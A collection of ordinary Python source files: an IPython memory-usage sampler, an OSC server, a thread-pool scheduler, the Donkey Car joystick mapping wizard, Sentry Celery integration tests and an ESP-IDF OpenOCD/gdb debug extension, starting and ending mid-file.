self.time_delta = time.time() - self.t1
new_memory_usage = memory_profiler.memory_usage()[0]
self.memory_delta = new_memory_usage - self.previous_call_memory_usage
self.keep_watching = False
self.peaked_memory_usage = max(0, self.peak_memory_usage - new_memory_usage)
num_commands = len(self.input_cells) - 1
cmd = "In [{}]".format(num_commands)
# convert the results into a pretty string
output_template = ("{cmd} used {memory_delta:0.3f} MiB RAM in "
"{time_delta:0.3f}s, peaked {peaked_memory_usage:0.3f} "
"MiB above current, total RAM usage "
"{memory_usage:0.3f} MiB")
output = output_template.format(
time_delta=self.time_delta,
cmd=cmd,
memory_delta=self.memory_delta,
peaked_memory_usage=self.peaked_memory_usage,
memory_usage=new_memory_usage)
print(str(output))
self.previous_call_memory_usage = new_memory_usage
def during_execution_memory_sampler(self):
import time
import memory_profiler
self.peak_memory_usage = -1
self.keep_watching = True
n = 0
WAIT_BETWEEN_SAMPLES_SECS = 0.001
MAX_ITERATIONS = 60.0 / WAIT_BETWEEN_SAMPLES_SECS
while True:
mem_usage = memory_profiler.memory_usage()[0]
self.peak_memory_usage = max(mem_usage, self.peak_memory_usage)
time.sleep(WAIT_BETWEEN_SAMPLES_SECS)
if not self.keep_watching or n > MAX_ITERATIONS:
# exit if we've been told our command has finished or
# if it has run for more than a sane amount of time
# (e.g. maybe something crashed and we don't want this
# to carry on running)
if n > MAX_ITERATIONS:
print("{} SOMETHING WEIRD HAPPENED AND THIS RAN FOR TOO LONG, THIS THREAD IS KILLING ITSELF".format(__file__))
break
n += 1
def pre_run_cell(self):
"""Capture current time before we execute the current command"""
# start a thread that samples RAM usage until the current
# command finishes
ipython_memory_usage_thread = threading.Thread(
target=self.during_execution_memory_sampler)
ipython_memory_usage_thread.daemon = True
ipython_memory_usage_thread.start()
self.t1 = time.time()
|
server.py
|
import threading
from pyee import EventEmitter
from pythonosc import dispatcher, osc_server
from tomomibot.const import OSC_ADDRESS, OSC_PORT
class Server:
def __init__(self, ctx, **kwargs):
self.ctx = ctx
self.is_running = False
# Provide an interface for event subscribers
self.emitter = EventEmitter()
# Prepare OSC message dispatcher and UDP server
self.address = kwargs.get('osc_address', OSC_ADDRESS)
self.port = kwargs.get('osc_port', OSC_PORT)
bind = (self.address, self.port)
disp = dispatcher.Dispatcher()
disp.map('/tomomibot/*', self._on_param)
self._server = osc_server.ThreadingOSCUDPServer(bind, disp)
def start(self):
thread = threading.Thread(target=self._start_server)
thread.daemon = True
thread.start()
self.is_running = True
def stop(self):
self._server.shutdown()
self.is_running = False
def _start_server(self):
self.ctx.log('OSC server @ {}:{}'.format(self.address,
self.port))
self._server.serve_forever()
def _on_param(self, address, *args):
param = address.replace('/tomomibot/', '')
# Commands with no arguments
if param == 'reset':
self.emitter.emit('reset')
return
# We expect one float argument from now on
if not len(args) == 1 or type(args[0]) is not float:
return
if param in ['temperature'] and 0 <= args[0] <= 1:
self.emitter.emit('param', param, args[0])
if param in ['interval'] and 0 <= args[0] <= 5:
self.emitter.emit('param', param, args[0])
if param in ['volume']:
self.emitter.emit('param', param, args[0])
|
scheduler.py
|
# !/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2018/3/31 21:53
# @Author : Yunhao Cao
# @File : scheduler.py
import time
import threading
import queue as Queue
__author__ = 'Yunhao Cao'
__all__ = [
'Scheduler',
]
def work_func(func, args, kwargs, queue, token):
args = args or []
kwargs = kwargs or {}
func(*args, **kwargs)
queue.put(token)
def wait_func(wait_queue, work_queue):
while True:
task = wait_queue.get()
func, args, kwargs = task
token = work_queue.get()
args = [func, args, kwargs, work_queue, token]
t = threading.Thread(target=work_func, args=args)
t.daemon = True
t.start()
class ThreadPool(object):
def __init__(self, size):
self.size = size
self.wait_queue = None
self.work_queue = None
self.wait_thread = None
self.init()
def init(self):
self.wait_queue = Queue.Queue()
self.work_queue = Queue.Queue(maxsize=self.size)
for i in range(self.size):
self.work_queue.put(i)
wait_thread = threading.Thread(target=wait_func, args=[self.wait_queue, self.work_queue])
wait_thread.daemon = True
wait_thread.start()
def put(self, func, args=None, kwargs=None):
self.wait_queue.put((func, args, kwargs))
class Scheduler(object):
def __init__(self, size=4):
self.pool = ThreadPool(size)
def put(self, func, args=None, kwargs=None):
self.pool.put(func, args, kwargs)
def hello(*args):
print(args)
print('{} says \'hello\' to {}.'.format(args[0], args[1]))
time.sleep(5)
print('{} end.'.format(args))
return args
def _test():
tp = ThreadPool(2)
tp.put(hello, ['a', 'b'])
tp.put(hello, ['c', 'd'])
tp.put(hello, ['e', 'f'])
tp.put(hello, ['1', '2'])
tp.put(hello, ['3', '4'])
print('main exit.')
if __name__ == '__main__':
_test()
|
joystick_creator.py
|
import sys
import os
import argparse
import json
import time
import math
from donkeycar.utils import *
from donkeycar.parts.controller import JoystickCreatorController
try:
from prettytable import PrettyTable
except:
print("need: pip install PrettyTable")
class CreateJoystick(object):
def __init__(self):
self.last_button = None
self.last_axis = None
self.axis_val = 0
self.running = False
self.thread = None
self.gyro_axis = []
self.axis_map = []
self.ignore_axis = False
self.mapped_controls = []
def poll(self):
while self.running:
button, button_state, axis, axis_val = self.js.poll()
if button is not None:
self.last_button = button
self.last_axis = None
self.axis_val = 0.0
elif axis is not None and not self.ignore_axis:
if not axis in self.gyro_axis:
self.last_axis = axis
self.last_button = None
self.axis_val = axis_val
def get_button_press(self, duration=10.0):
self.last_button = None
start = time.time()
while self.last_button is None and time.time() - start < duration:
time.sleep(0.1)
return self.last_button
def get_axis_move(self, duration=2.0):
self.last_axis = None
axis_samples = {}
start = time.time()
while time.time() - start < duration:
if self.last_axis:
if self.last_axis in axis_samples:
try:
axis_samples[self.last_axis] = axis_samples[self.last_axis] + math.fabs(self.axis_val)
except:
try:
axis_samples[self.last_axis] = math.fabs(self.axis_val)
except:
pass
else:
axis_samples[self.last_axis] = math.fabs(self.axis_val)
most_movement = None
most_val = 0
for key, value in axis_samples.items():
if value > most_val:
most_movement = key
most_val = value
return most_movement
def clear_scr(self):
print(chr(27) + "[2J")
def create_joystick(self, args):
self.clear_scr()
print("##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~##")
print("## Welcome to Joystick Creator Wizard. ##")
print("##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~##")
print("This will generate code to use your joystick with a Donkey car.")
print()
print("Overview:")
print()
print("First we name each button, then each axis control.")
print("Next we map names to actions.")
print("Finally we output a python file you can use in your project.")
print()
input('Hit Enter to continue')
self.clear_scr()
print("Please plug-in your controller via USB or bluetooth. Make sure status lights are on and device is mapped.")
input('Enter to continue ')
self.clear_scr()
self.init_js_device()
print()
self.init_polling_js()
self.clear_scr()
self.find_gyro()
self.clear_scr()
self.explain_config()
self.clear_scr()
self.name_buttons()
self.clear_scr()
self.name_axes()
self.clear_scr()
self.map_steering_throttle()
self.clear_scr()
self.map_button_controls()
self.clear_scr()
self.revisit_topic()
self.clear_scr()
self.write_python_class_file()
print("Check your new python file to see the controller implementation. Import this in manage.py and use for control.")
self.shutdown()
def init_js_device(self):
from donkeycar.parts.controller import JoystickCreatorController
js_cr = None
#Get device file and create js creator helper class
while js_cr is None:
print("Where can we find the device file for your joystick?")
dev_fn = input("Hit Enter for default: /dev/input/js0 or type alternate path: ")
if len(dev_fn) is 0:
dev_fn = '/dev/input/js0'
print()
print("Attempting to open device at that file...")
try:
js_cr = JoystickCreatorController(dev_fn=dev_fn)
res = js_cr.init_js()
if res:
print("Found and accessed input device.")
else:
js_cr = None
except Exception as e:
print("threw exception:" + str(e))
js_cr = None
if js_cr is None:
ret = input("Failed to open device. try again? [Y/n] : ")
if ret.upper() == "N":
exit(0)
self.js = js_cr.js
input("Hit Enter to continue")
def init_polling_js(self):
self.running = True
import threading
self.thread = threading.Thread(target=self.poll)
self.thread.daemon = True
self.thread.start()
def find_gyro(self):
print("Next we are going to look for gyroscope data.")
input("For 5 seconds, move controller and rotate on each axis. Hit Enter then start moving: ")
start = time.time()
while time.time() - start < 5.0:
if self.last_axis is not None and not self.last_axis in self.gyro_axis:
self.gyro_axis.append(self.last_axis)
print()
if len(self.gyro_axis) > 0:
print("Ok, we found %d axes that stream gyroscope data. We will ignore those during labelling and mapping." % len(self.gyro_axis))
else:
print("Ok, we didn't see any events. So perhaps your controller doesn't emit gyroscope data. No problem.")
input("Hit Enter to continue ")
def get_code_from_button(self, button):
code = button
if 'unknown' in button:
try:
code_str = button.split('(')[1][:-1]
code = int(code_str, 16)
except Exception as e:
code = None
print("failed to parse code", str(e))
return code
def explain_config(self):
print("We will display the current progress in this set of tables:")
print()
self.print_config()
print("\nAs you name buttons and map them to controls this table will be updated.")
input("Hit enter to continue")
def name_buttons(self):
done = False
self.ignore_axis = True
self.print_config()
print('Next we will give every button a name. Not analog yet. We will do that next.')
while not done:
print('Tap a button to name it.')
self.get_button_press()
if self.last_button is None:
print("No button was pressed in last 10 seconds. It's possible that your buttons all generate axis commands.")
ret = input("Keep mapping buttons? [Y, n]")
if ret == 'n':
break
elif 'unknown' in self.last_button:
code = self.get_code_from_button(self.last_button)
if code is not None:
if code in self.js.button_names:
ret = input("This button has a name: %s. Are you done naming? (y/N) " % self.js.button_names[code])
if ret.upper() == "Y":
done = True
break
label = input("What name to give to this button:")
if len(label) == 0:
print("No name given. skipping.")
else:
self.clear_scr()
self.js.button_names[code] = label
self.print_config()
else:
print('got press: ', self.last_button)
self.clear_scr()
self.print_config()
def print_config(self):
pt = PrettyTable()
pt.field_names = ["button code", "button name"]
for key, value in self.js.button_names.items():
pt.add_row([str(hex(key)), str(value)])
print("Button Map:")
print(pt)
pt = PrettyTable()
pt.field_names = ["axis code", "axis name"]
for key, value in self.js.axis_names.items():
pt.add_row([str(hex(key)), str(value)])
print("Axis Map:")
print(pt)
pt = PrettyTable()
pt.field_names = ["control", "action"]
for button, control in self.mapped_controls:
pt.add_row([button, control])
for axis, control in self.axis_map:
pt.add_row([axis, control])
print("Control Map:")
print(pt)
def name_axes(self):
self.print_config()
print()
print('Next we are going to name all the axis you would like to use.')
done = False
self.ignore_axis = False
while not done:
print('Prepare to move one axis on the controller for 2 sec.')
ret = input("Hit Enter to begin. D when done. ")
if ret.upper() == 'D':
break
most_movement = self.get_axis_move()
if most_movement is None:
print("Didn't detect any movement.")
res = input("Try again? [Y/n]: ")
if res == "n":
done = True
break
else:
continue
if 'unknown' in most_movement:
code_str = most_movement.split('(')[1][:-1]
print('Most movement on axis code:', code_str)
try:
code = int(code_str, 16)
except Exception as e:
code = None
print("Failed to parse code", str(e))
if code is not None:
label = input("What name to give to this axis: (D when done) ")
if len(label) == 0:
print("No name given. skipping.")
elif label.upper() == 'D':
done = True
else:
self.js.axis_names[code] = label
self.clear_scr()
self.print_config()
else:
print('Got axis: ', self.last_axis)
print()
def write_python_class_file(self):
pyth_filename = None
outfile = None
while pyth_filename is None:
print("Now we will write these values to a new python file.")
pyth_filename = input("What is the name of python file to create joystick code? [default: my_joystick.py]")
if len(pyth_filename) == 0:
pyth_filename = 'my_joystick.py'
print('using filename:', pyth_filename)
print()
try:
outfile = open(pyth_filename, "wt")
except:
ret = input("failed to open filename. Enter another filename? [Y,n]")
if ret == "n":
break
pyth_filename = None
print()
if outfile is not None:
classname = input("What is the name of joystick class? [default: MyJoystick] ")
if len(classname) == 0:
classname = "MyJoystick"
file_header = \
'''
from donkeycar.parts.controller import Joystick, JoystickController
class %s(Joystick):
#An interface to a physical joystick available at /dev/input/js0
def __init__(self, *args, **kwargs):
super(%s, self).__init__(*args, **kwargs)
\n''' % (classname, classname )
outfile.write(file_header)
outfile.write(' self.button_names = {\n')
for key, value in self.js.button_names.items():
outfile.write(" %s : '%s',\n" % (str(hex(key)), str(value)))
outfile.write(' }\n\n\n')
outfile.write(' self.axis_names = {\n')
for key, value in self.js.axis_names.items():
outfile.write(" %s : '%s',\n" % (str(hex(key)), str(value)))
outfile.write(' }\n\n\n')
js_controller = \
'''
class %sController(JoystickController):
#A Controller object that maps inputs to actions
def __init__(self, *args, **kwargs):
super(%sController, self).__init__(*args, **kwargs)
def init_js(self):
#attempt to init joystick
try:
self.js = %s(self.dev_fn)
self.js.init()
except FileNotFoundError:
print(self.dev_fn, "not found.")
self.js = None
return self.js is not None
def init_trigger_maps(self):
#init set of mapping from buttons to function calls
\n''' % (classname, classname, classname)
outfile.write(js_controller)
outfile.write(' self.button_down_trigger_map = {\n')
for button, control in self.mapped_controls:
outfile.write(" '%s' : self.%s,\n" % (str(button), str(control)))
outfile.write(' }\n\n\n')
outfile.write(' self.axis_trigger_map = {\n')
for axis, control in self.axis_map:
outfile.write(" '%s' : self.%s,\n" % (str(axis), str(control)))
outfile.write(' }\n\n\n')
outfile.close()
print(pyth_filename, "written.")
def map_control_axis(self, control_name, control_fn):
while True:
axis = self.get_axis_action('Move the controller axis you wish to use for %s. Continue moving for 2 seconds.' % control_name)
mapped = False
if axis is None:
print("No mapping for %s." % control_name)
else:
#print("axis", axis)
code = self.get_code_from_button(axis)
for key, value in self.js.axis_names.items():
#print('key', key, 'value', value)
if key == code or value == code:
print('Mapping %s to %s.\n' % (value, control_name))
mapped = value
break
if mapped:
ret = input('Is this mapping ok? (y, N) ')
if ret.upper() == 'Y':
self.axis_map.append((mapped, control_fn))
return
else:
ret = input('axis not recognized. try again? (Y, n) ')
if ret.upper() == 'N':
return
def map_steering_throttle(self):
self.axis_map = []
self.print_config()
print()
print('Now we will create a mapping of controls to actions.\n')
print("First steering.")
self.map_control_axis("steering", "set_steering")
self.clear_scr()
self.print_config()
print()
print("Next throttle.")
self.map_control_axis("throttle", "set_throttle")
def map_button_controls(self):
unmapped_controls = [\
('toggle_mode','changes the drive mode between user, local, and local_angle'),
('erase_last_N_records','erases the last 100 records while driving'),
('emergency_stop','executes a full back throttle to bring car to a quick stop'),
('increase_max_throttle','increases the max throttle, also used for constant throttle val'),
('decrease_max_throttle','decreases the max throttle, also used for constant throttle val'),
('toggle_constant_throttle', 'toggle the mode of supplying constant throttle'),
('toggle_manual_recording','toggles recording records on and off')
]
self.mapped_controls = []
self.print_config()
print()
print("Next we are going to assign button presses to controls.")
print()
while len(unmapped_controls) > 0:
pt = PrettyTable()
pt.field_names = ['Num', 'Control', 'Help']
print("Unmapped Controls:")
for i, td in enumerate(unmapped_controls):
control, help = td
pt.add_row([i + 1, control, help])
print(pt)
print()
try:
ret = " "
while (not ret.isdigit() and ret.upper() != 'D') or (ret.isdigit() and (int(ret) < 1 or int(ret) > len(unmapped_controls))):
ret = input("Press the number of control to map (1-%d). D when done. " % len(unmapped_controls))
if ret.upper() == 'D':
break
iControl = int(ret) - 1
except:
continue
print('Press the button to map to control:', unmapped_controls[iControl][0])
self.get_button_press()
if self.last_button is None:
print("No button was pressed in last 10 seconds.")
ret = input("Keep mapping commands? [Y, n]")
if ret == 'n':
break
else:
code = self.get_code_from_button(self.last_button)
if code in self.js.button_names:
button_name = self.js.button_names[code]
else:
button_name = self.last_button
self.mapped_controls.append((button_name, unmapped_controls[iControl][0]))
unmapped_controls.pop(iControl)
self.clear_scr()
self.print_config()
print()
print('done mapping controls')
print()
def revisit_topic(self):
done = False
while not done:
self.clear_scr()
self.print_config()
print("Now we are nearly done! Are you happy with this config or would you like to revisit a topic?")
print("H)appy, please continue to write out python file.")
print("B)uttons need renaming.")
print("A)xes need renaming.")
print("T)hrottle and steering need remap.")
print("R)emap buttons to controls.")
ret = input("Select option ").upper()
if ret == 'H':
done = True
elif ret == 'B':
self.name_buttons()
elif ret == 'A':
self.name_axes()
elif ret == 'T':
self.map_steering_throttle()
elif ret == 'R':
self.map_button_controls()
def get_axis_action(self, prompt):
done = False
while not done:
print(prompt)
ret = input("Hit Enter to begin. D when done. ")
if ret.upper() == 'D':
return None
most_movement = self.get_axis_move()
if most_movement is None:
print("Didn't detect any movement.")
res = input("Try again? [Y/n]: ")
if res == "n":
return None
else:
continue
else:
return most_movement
def shutdown(self):
self.running = False
if self.thread:
self.thread = None
def parse_args(self, args):
parser = argparse.ArgumentParser(prog='createjs', usage='%(prog)s [options]')
parsed_args = parser.parse_args(args)
return parsed_args
def run(self, args):
args = self.parse_args(args)
try:
self.create_joystick(args)
except KeyboardInterrupt:
self.shutdown()
|
test_celery.py
|
import threading
import pytest
pytest.importorskip("celery")
from sentry_sdk import Hub, configure_scope
from sentry_sdk.integrations.celery import CeleryIntegration
from sentry_sdk.tracing import SpanContext
from celery import Celery, VERSION
from celery.bin import worker
@pytest.fixture
def connect_signal(request):
def inner(signal, f):
signal.connect(f)
request.addfinalizer(lambda: signal.disconnect(f))
return inner
@pytest.fixture
def init_celery(sentry_init):
def inner(propagate_traces=True):
sentry_init(integrations=[CeleryIntegration(propagate_traces=propagate_traces)])
celery = Celery(__name__)
if VERSION < (4,):
celery.conf.CELERY_ALWAYS_EAGER = True
else:
celery.conf.task_always_eager = True
return celery
return inner
@pytest.fixture
def celery(init_celery):
return init_celery()
@pytest.mark.parametrize(
"invocation,expected_context",
[
[lambda task, x, y: task.delay(x, y), {"args": [1, 0], "kwargs": {}}],
[lambda task, x, y: task.apply_async((x, y)), {"args": [1, 0], "kwargs": {}}],
[
lambda task, x, y: task.apply_async(args=(x, y)),
{"args": [1, 0], "kwargs": {}},
],
[
lambda task, x, y: task.apply_async(kwargs=dict(x=x, y=y)),
{"args": [], "kwargs": {"x": 1, "y": 0}},
],
],
)
def test_simple(capture_events, celery, invocation, expected_context):
events = capture_events()
@celery.task(name="dummy_task")
def dummy_task(x, y):
foo = 42 # noqa
return x / y
span_context = SpanContext.start_trace()
with configure_scope() as scope:
scope.set_span_context(span_context)
invocation(dummy_task, 1, 2)
invocation(dummy_task, 1, 0)
event, = events
assert event["contexts"]["trace"]["trace_id"] == span_context.trace_id
assert event["contexts"]["trace"]["span_id"] != span_context.span_id
assert event["transaction"] == "dummy_task"
assert event["extra"]["celery-job"] == dict(
task_name="dummy_task", **expected_context
)
exception, = event["exception"]["values"]
assert exception["type"] == "ZeroDivisionError"
assert exception["mechanism"]["type"] == "celery"
assert exception["stacktrace"]["frames"][0]["vars"]["foo"] == "42"
def test_simple_no_propagation(capture_events, init_celery):
celery = init_celery(propagate_traces=False)
events = capture_events()
@celery.task(name="dummy_task")
def dummy_task():
1 / 0
span_context = SpanContext.start_trace()
with configure_scope() as scope:
scope.set_span_context(span_context)
dummy_task.delay()
event, = events
assert event["contexts"]["trace"]["trace_id"] != span_context.trace_id
assert event["transaction"] == "dummy_task"
exception, = event["exception"]["values"]
assert exception["type"] == "ZeroDivisionError"
def test_ignore_expected(capture_events, celery):
events = capture_events()
@celery.task(name="dummy_task", throws=(ZeroDivisionError,))
def dummy_task(x, y):
return x / y
dummy_task.delay(1, 2)
dummy_task.delay(1, 0)
assert not events
def test_broken_prerun(init_celery, connect_signal):
from celery.signals import task_prerun
stack_lengths = []
def crash(*args, **kwargs):
# scope should exist in prerun
stack_lengths.append(len(Hub.current._stack))
1 / 0
# Order here is important to reproduce the bug: In Celery 3, a crashing
# prerun would prevent other preruns from running.
connect_signal(task_prerun, crash)
celery = init_celery()
assert len(Hub.current._stack) == 1
@celery.task(name="dummy_task")
def dummy_task(x, y):
stack_lengths.append(len(Hub.current._stack))
return x / y
if VERSION >= (4,):
dummy_task.delay(2, 2)
else:
with pytest.raises(ZeroDivisionError):
dummy_task.delay(2, 2)
assert len(Hub.current._stack) == 1
if VERSION < (4,):
assert stack_lengths == [2]
else:
assert stack_lengths == [2, 2]
@pytest.mark.xfail(
(4, 2, 0) <= VERSION,
strict=True,
reason="https://github.com/celery/celery/issues/4661",
)
def test_retry(celery, capture_events):
events = capture_events()
failures = [True, True, False]
runs = []
@celery.task(name="dummy_task", bind=True)
def dummy_task(self):
runs.append(1)
try:
if failures.pop(0):
1 / 0
except Exception as exc:
self.retry(max_retries=2, exc=exc)
dummy_task.delay()
assert len(runs) == 3
assert not events
failures = [True, True, True]
runs = []
dummy_task.delay()
assert len(runs) == 3
event, = events
exceptions = event["exception"]["values"]
for e in exceptions:
assert e["type"] == "ZeroDivisionError"
@pytest.mark.skipif(VERSION < (4,), reason="in-memory backend broken")
def test_transport_shutdown(request, celery, capture_events_forksafe, tmpdir):
events = capture_events_forksafe()
celery.conf.worker_max_tasks_per_child = 1
celery.conf.broker_url = "memory://localhost/"
celery.conf.broker_backend = "memory"
celery.conf.result_backend = "file://{}".format(tmpdir.mkdir("celery-results"))
celery.conf.task_always_eager = False
runs = []
@celery.task(name="dummy_task", bind=True)
def dummy_task(self):
runs.append(1)
1 / 0
res = dummy_task.delay()
w = worker.worker(app=celery)
t = threading.Thread(target=w.run)
t.daemon = True
t.start()
with pytest.raises(Exception):
# Celery 4.1 raises a gibberish exception
res.wait()
event = events.read_event()
exception, = event["exception"]["values"]
assert exception["type"] == "ZeroDivisionError"
events.read_flush()
# if this is nonempty, the worker never really forked
assert not runs
|
debug_ext.py
|
import json
import os
import re
import shlex
import subprocess
import sys
import threading
import time
from threading import Thread
from idf_py_actions.errors import FatalError
from idf_py_actions.tools import ensure_build_directory
PYTHON = sys.executable
def action_extensions(base_actions, project_path):
OPENOCD_OUT_FILE = 'openocd_out.txt'
GDBGUI_OUT_FILE = 'gdbgui_out.txt'
# Internal dictionary of currently active processes, threads and their output files
processes = {'threads_to_join': [], 'openocd_issues': None}
def _check_for_common_openocd_issues(file_name, print_all=True):
if processes['openocd_issues'] is not None:
return processes['openocd_issues']
try:
message = 'Please check JTAG connection!'
with open(file_name, 'r') as f:
content = f.read()
if print_all:
print(content)
if re.search(r'Address already in use', content):
message = ('Please check if another process uses the mentioned ports. OpenOCD already running, perhaps in the background?\n'
'Please list all processes to check if OpenOCD is already running; if so, terminate it before starting OpenOCD from idf.py')
finally:
processes['openocd_issues'] = message
return message
def _check_openocd_errors(fail_if_openocd_failed, target, ctx):
if fail_if_openocd_failed:
if 'openocd' in processes and processes['openocd'] is not None:
p = processes['openocd']
name = processes['openocd_outfile_name']
# watch OpenOCD (for 5x500ms) to check if it hasn't terminated or outputs an error
for _ in range(5):
if p.poll() is not None:
print('OpenOCD exited with {}'.format(p.poll()))
break
with open(name, 'r') as f:
content = f.read()
if re.search(r'no device found', content):
break
if re.search(r'Listening on port \d+ for gdb connections', content):
# expect OpenOCD has started successfully - stop watching
return
time.sleep(0.5)
else:
return
# OpenOCD exited or error message detected -> print possible output and terminate
raise FatalError('Action "{}" failed due to errors in OpenOCD:\n{}'.format(target, _check_for_common_openocd_issues(name)), ctx)
def _terminate_async_target(target):
if target in processes and processes[target] is not None:
try:
if target + '_outfile' in processes:
processes[target + '_outfile'].close()
p = processes[target]
if p.poll() is None:
p.terminate()
# waiting 10x100ms for the process to terminate gracefully
for _ in range(10):
if p.poll() is not None:
break
time.sleep(0.1)
else:
p.kill()
if target + '_outfile_name' in processes:
if target == 'openocd':
print(_check_for_common_openocd_issues(processes[target + '_outfile_name'], print_all=False))
os.unlink(processes[target + '_outfile_name'])
except Exception as e:
print(e)
print('Failed to close/kill {}'.format(target))
processes[target] = None # to indicate this has ended
def _get_commandline_options(ctx):
""" Return all the command line options up to first action """
# This approach ignores argument parsing done Click
result = []
for arg in sys.argv:
if arg in ctx.command.commands_with_aliases:
break
result.append(arg)
return result
def create_local_gdbinit(gdbinit, elf_file):
with open(gdbinit, 'w') as f:
if os.name == 'nt':
elf_file = elf_file.replace('\\','\\\\')
f.write('file {}\n'.format(elf_file))
f.write('target remote :3333\n')
f.write('mon reset halt\n')
f.write('flushregs\n')
f.write('thb app_main\n')
f.write('c\n')
def debug_cleanup():
print('cleaning up debug targets')
for t in processes['threads_to_join']:
if threading.currentThread() != t:
t.join()
_terminate_async_target('openocd')
_terminate_async_target('gdbgui')
_terminate_async_target('gdb')
def post_debug(action, ctx, args, **kwargs):
""" Deal with asynchronous targets, such as openocd running in background """
if kwargs['block'] == 1:
for target in ['openocd', 'gdbgui']:
if target in processes and processes[target] is not None:
break
else:
return
try:
p = processes[target]
name = processes[target + '_outfile_name']
pos = 0
while True:
with open(name, 'r') as f:
f.seek(pos)
for line in f:
print(line.rstrip())
pos = f.tell()
if p.poll() is not None:
print('"{}" exited with {}'.format(target, p.poll()))
break
time.sleep(0.5)
except KeyboardInterrupt:
print('Terminated -> exiting debug utility targets')
_terminate_async_target('openocd')
_terminate_async_target('gdbgui')
def get_project_desc(args, ctx):
desc_path = os.path.join(args.build_dir, 'project_description.json')
if not os.path.exists(desc_path):
ensure_build_directory(args, ctx.info_name)
with open(desc_path, 'r') as f:
project_desc = json.load(f)
return project_desc
def openocd(action, ctx, args, openocd_scripts, openocd_commands):
"""
Execute openocd as external tool
"""
OPENOCD_TAGET_CONFIG = {
'esp32': '-f board/esp32-wrover-kit-3.3v.cfg',
'esp32s2': '-f board/esp32s2-kaluga-1.cfg',
}
if os.getenv('OPENOCD_SCRIPTS') is None:
raise FatalError('OPENOCD_SCRIPTS not found in the environment: Please run export.sh/export.bat', ctx)
openocd_arguments = os.getenv('OPENOCD_COMMANDS') if openocd_commands is None else openocd_commands
project_desc = get_project_desc(args, ctx)
if openocd_arguments is None:
# use default value if commands not defined in the environment nor command line
target = project_desc['target']
default_args = '-f interface/ftdi/esp32_devkitj_v1.cfg -f target/{}.cfg'.format(target)
openocd_arguments = OPENOCD_TAGET_CONFIG.get(target, default_args)
print('Note: OpenOCD cfg not found (via env variable OPENOCD_COMMANDS nor as a --openocd-commands argument)\n'
'OpenOCD arguments default to: "{}"'.format(openocd_arguments))
# script directory is taken from the environment by OpenOCD, update only if command line arguments to override
if openocd_scripts is not None:
openocd_arguments += ' -s {}'.format(openocd_scripts)
local_dir = project_desc['build_dir']
args = ['openocd'] + shlex.split(openocd_arguments)
openocd_out_name = os.path.join(local_dir, OPENOCD_OUT_FILE)
openocd_out = open(openocd_out_name, 'a+')
try:
process = subprocess.Popen(args, stdout=openocd_out, stderr=subprocess.STDOUT, bufsize=1)
except Exception as e:
print(e)
raise FatalError('Error starting openocd. Please make sure it is installed and is present in executable paths', ctx)
processes['openocd'] = process
processes['openocd_outfile'] = openocd_out
processes['openocd_outfile_name'] = openocd_out_name
print('OpenOCD started as a background task {}'.format(process.pid))
def gdbui(action, ctx, args, gdbgui_port, gdbinit, require_openocd):
"""
Asynchronous GDB-UI target
"""
project_desc = get_project_desc(args, ctx)
local_dir = project_desc['build_dir']
gdb = project_desc['monitor_toolprefix'] + 'gdb'
if gdbinit is None:
gdbinit = os.path.join(local_dir, 'gdbinit')
create_local_gdbinit(gdbinit, os.path.join(args.build_dir, project_desc['app_elf']))
args = ['gdbgui', '-g', gdb, '--gdb-args="-x={}"'.format(gdbinit)]
if gdbgui_port is not None:
args += ['--port', gdbgui_port]
gdbgui_out_name = os.path.join(local_dir, GDBGUI_OUT_FILE)
gdbgui_out = open(gdbgui_out_name, 'a+')
env = os.environ.copy()
# The only known solution for https://github.com/cs01/gdbgui/issues/359 is to set the following environment
# variable. The greenlet package cannot be downgraded for compatibility with other requirements (gdbgui,
# pygdbmi).
env['PURE_PYTHON'] = '1'
try:
process = subprocess.Popen(args, stdout=gdbgui_out, stderr=subprocess.STDOUT, bufsize=1, env=env)
except Exception as e:
print(e)
raise FatalError('Error starting gdbgui. Please make sure gdbgui can be started', ctx)
processes['gdbgui'] = process
processes['gdbgui_outfile'] = gdbgui_out
processes['gdbgui_outfile_name'] = gdbgui_out_name
print('gdbgui started as a background task {}'.format(process.pid))
_check_openocd_errors(fail_if_openocd_failed, action, ctx)
def global_callback(ctx, global_args, tasks):
def move_to_front(task_name):
for index, task in enumerate(tasks):
if task.name == task_name:
tasks.insert(0, tasks.pop(index))
break
debug_targets = any([task.name in ('openocd', 'gdbgui') for task in tasks])
if debug_targets:
# Register the meta cleanup callback -> called on FatalError
ctx.meta['cleanup'] = debug_cleanup
move_to_front('gdbgui') # possibly 2nd
move_to_front('openocd') # always 1st
# followed by "monitor", "gdb" or "gdbtui" in any order
post_action = ctx.invoke(ctx.command.get_command(ctx, 'post_debug'))
if any([task.name in ('monitor', 'gdb', 'gdbtui') for task in tasks]):
post_action.action_args['block'] = 0
else:
post_action.action_args['block'] = 1
tasks.append(post_action) # always last
if any([task.name == 'openocd' for task in tasks]):
for task in tasks:
if task.name in ('gdb', 'gdbgui', 'gdbtui'):
task.action_args['require_openocd'] = True
def run_gdb(gdb_args):
p = subprocess.Popen(gdb_args)
processes['gdb'] = p
return p.wait()
def gdbtui(action, ctx, args, gdbinit, require_openocd):
"""
Synchronous GDB target with text ui mode
"""
gdb(action, ctx, args, 1, gdbinit, require_openocd)
def gdb(action, ctx, args, gdb_tui, gdbinit, require_openocd):
"""
Synchronous GDB target
"""
watch_openocd = Thread(target=_check_openocd_errors, args=(fail_if_openocd_failed, action, ctx, ))
watch_openocd.start()
processes['threads_to_join'].append(watch_openocd)
desc_path = os.path.join(args.build_dir, 'project_description.json')
if not os.path.exists(desc_path):
ensure_build_directory(args, ctx.info_name)
with open(desc_path, 'r') as f:
project_desc = json.load(f)
elf_file = os.path.join(args.build_dir, project_desc['app_elf'])
if not os.path.exists(elf_file):
raise FatalError('ELF file not found. You need to build & flash the project before running debug targets', ctx)
gdb = project_desc['monitor_toolprefix'] + 'gdb'
local_dir = project_desc['build_dir']
if gdbinit is None:
gdbinit = os.path.join(local_dir, 'gdbinit')
create_local_gdbinit(gdbinit, elf_file)
args = [gdb, '-x={}'.format(gdbinit)]
if gdb_tui is not None:
args += ['-tui']
t = Thread(target=run_gdb, args=(args, ))
t.start()
while True:
try:
t.join()
break
except KeyboardInterrupt:
# Catching Keyboard interrupt, as this is used for breaking running program in gdb
continue
finally:
watch_openocd.join()
try:
processes['threads_to_join'].remove(watch_openocd)
except ValueError:
# Valid scenario: watch_openocd task won't be in the list if openocd not started from idf.py
pass
fail_if_openocd_failed = {
